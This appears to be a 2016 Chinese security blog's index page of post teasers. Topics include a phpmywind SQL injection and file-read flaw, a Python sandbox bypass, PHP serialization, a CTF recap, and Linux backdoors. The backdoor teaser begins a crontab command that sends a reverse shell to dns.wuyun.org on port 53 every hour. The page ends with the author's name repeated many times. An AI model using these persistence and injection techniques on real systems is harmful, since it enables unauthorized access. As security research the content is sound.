上一页 1 ··· 7 8 9 10 11 12 13 下一页
2016年7月3日
jsp电商开发笔记
摘要: 感谢bootstrap... 结构 本次未用到其他框架,单纯的理解一下开发模式,与mvc相比,个人在jsp中理解这个模式是: servlet做控制层,javabean做model层,前面的jsp则是view层 大概流程 访问 过滤器 jsp servlet javabean servlet jsp 阅读全文
posted @ 2016-07-03 22:19 l3m0n 阅读(1093) 评论(0) 推荐(0)
2016年6月21日
如何在shell下自动获取回收站内所有的文件信息
摘要: 师傅提的一个问题,感觉不错,渗透时候需要的就是收集更多信息。 http://zone.wooyun.org/content/27961 已知: 可查询回收站内存储的被删除文件 可查看回收站内存储的被删除文件的路径信息 1、powershell实现: 2、exe实现 https://github.co 阅读全文
posted @ 2016-06-21 12:15 l3m0n 阅读(1102) 评论(0) 推荐(0)
2016年6月17日
phpmywind最新版sql注入以及后台目录遍历和文件读取
摘要: 最新版本 5.3 看wooyun厂商这忽略的架势就觉得是有点放弃治疗的想法啊。 前台会员注入 分析 http://www.wooyun.org/bugs/wooyun-2015-0117008 我看了一下最新版还有这个注入,而作者给的exp有坑处。 这是一个完善账号的功能,在核心文件里面,这个程序用 阅读全文
posted @ 2016-06-17 22:25 l3m0n 阅读(3425) 评论(1) 推荐(0)
2016年5月29日
blog开发记录
摘要: 前言 算是在完成作业的前提下花了6天弄完,功能少而且存在大量bug以及安全问题,主要是练习mvc框架的构思,也算是第一次从前端设计到框架构写再到后端逻辑处理。记录一下遇到的坑点。 前端:bootstrap + jquery 后端:php 数据库:mysql 开发时的运行环境:phpstudy + w 阅读全文
posted @ 2016-05-29 13:57 l3m0n 阅读(527) 评论(0) 推荐(0)
2016年5月20日
python编码问题
摘要: win下的Dos乱码 utf 8保存的文件,在win中映射为gbk,输出文字就是乱码的,或者读取网页的时候在dos下输出,因为dos是用gbk编码,这样就容易导致出错 解决办法: 另外还有一种情况是一些软件(notepad)在保存utf 8会在文件开头插入不可见字符 可以用codecs模块来处理 p 阅读全文
posted @ 2016-05-20 16:19 l3m0n 阅读(367) 评论(0) 推荐(0)
2016年5月14日
python_eval_and_bypass_sandbox_study
摘要: __builtin__与__builtins__的区别与关系 python有一个内建模块,该模块会在python启动后,但在没有执行python代码前,会被加载到内存.即可用调用里面的函数,其中python2.x中是 ,python3.x中更名为 输出 即在python代码中我们可以直接使用这些函数 阅读全文
posted @ 2016-05-14 22:20 l3m0n 阅读(2292) 评论(2) 推荐(0)
2016年5月13日
Linux_backdoor
摘要: Linux权限维持 前言 并未深入研究backdoor是怎么写的,只是研究一下网上存在的几种后门的用法。 测试环境:centos 6.5 crontab 计划任务,永远的爱 每60分钟反弹一次shell给dns.wuyun.org的53端口 (crontab l;printf " /60 exec 阅读全文
posted @ 2016-05-13 12:49 l3m0n 阅读(1900) 评论(0) 推荐(0)
2016年5月9日
sctf2016_sycshell出题小结
摘要: 0x01 tip: 对于企业那种,可能会在源码中看到一些虚拟主机配置后,在内网里面是使用hosts,由于没对其进行限制,可导致外网访问其内容 即修改一下本地的hosts: 0x02 tip: "jsfuck下载" 直接运行时弹框: /NO TIP/ 他的函数运行规则是,所以重在这个函数体 jsfuc 阅读全文
posted @ 2016-05-09 19:51 l3m0n 阅读(1262) 评论(0) 推荐(0)
dns/http_log
摘要: 上计算机网络课的时候并没怎么认真听啊,导致都是很懵逼的状态,记录一下。 dns请求是通过udp实现,http请求是通过tcp完成 通过这点就可以利用套接字来实现一个小小的cloudeye http_dns_log: 一般用python自带的去接收请求log 利用 判断: 本文来自:http://zo 阅读全文
posted @ 2016-05-09 19:38 l3m0n 阅读(445) 评论(0) 推荐(0)
2016年4月19日
php序列化
摘要: [TOC] 1. 基础 1.1 什么是序列化 序列化是对象串行化,对象是一种在内存中存储的数据类型,寿命是随生成该对象的程序的终止而终止,为了持久使用对象的状态,将其通过serialize()函数进行序列化为一行字符串保存为文件,使用时再用unserialize()反序列化为对象 序列化后的格式: 阅读全文
posted @ 2016-04-19 00:55 l3m0n 阅读(5544) 评论(3) 推荐(0)
上一页 1 ··· 7 8 9 10 11 12 13 下一页
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
L3m0n
点击右上角即可分享
微信分享提示